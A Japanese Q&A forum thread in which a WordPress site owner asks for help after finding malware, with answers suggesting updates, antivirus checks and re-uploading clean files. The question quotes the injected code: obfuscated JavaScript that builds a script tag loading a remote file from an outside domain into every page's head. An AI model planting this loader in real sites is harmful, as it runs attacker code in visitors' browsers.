ID非公開

2020/9/4 23:44

22回答

助けてください。 ワードプレスで運営しているサイト(http://eal-heal.com)がマルウェアに感染していることが先ほど発覚しました。

助けてください。 ワードプレスで運営しているサイト(http://eal-heal.com)がマルウェアに感染していることが先ほど発覚しました。 サイトにアクセスすると、ヘッダーに不明なコード(以下に記載)が表示されます。 -------------------------------------------------------------------------------------------------- Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,116,101,109,112,46,108,111,119,101,114,98,101,102,111,114,119,97,114,100,101,110,46,109,108,47,116,101,109,112,46,106,115);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})(); -------------------------------------------------------------------------------------------------- プログラミングなどについては一切知識がないのですが、対処法(サイトの復旧方法)を教えていただけないでしょうか? サイトの表示状況を画像で添付してあります ※ワードプレス管理画面にはログインできます ※記事などコンテンツは通常通り表示されています ※ロリポップサーバーで海外アクセスガードは有効にしてあります ※自身PCのセキュリティソフトで、サイトにアクセス時に【temp.lowerbeforwarden.ml】から攻撃があったとの通知がありました

ホームページ作成 | ブログサービス63閲覧xmlns="http://www.w3.org/2000/svg">500

ベストアンサー

0

WordPress 本体やテーマ、プラグイン等のアップデートの通知がある場合は、最新のバージョンにして下さい。 マルウェアは自身のパソコンが感染していて、感染したファイルをメディア等を使ってアップロードしてしまっている可能性もあります。パソコンにマルウェア対策の機能があるアンチウィルスソフトを入れてますか? 入れていれば、その可能性は低いですが。

ID非公開

質問者

2020/9/5 17:07

回答ありがとうございます。 プラグインは現在すべて更新してある状態です。 自分のPCが感染している可能性もあるんですね。 それはどうしたらPC自体が感染していると分かるのでしょうか..? 現在はノートンセキュリティソフトを使用しています。

ThanksImg質問者からのお礼コメント

回答いただきありがとうございました。 何もわからずでしたが、コードなど見ていただき助かりました。 感染対策強化しようと思います(:_;)

お礼日時:9/6 11:15

その他の回答(1件)

0

>対処法(サイトの復旧方法)を教えていただけないでしょうか? ローカルからファイルをアップロードしなおす感じが一般的になりますね

ID非公開

質問者

2020/9/5 0:18

回答ありがとうございます! >ローカルからファイルをアップロードしなおす まだ意味があまりよく分かってないのですが、 ロリポップサーバーのFTPで操作するという意味でしょうか?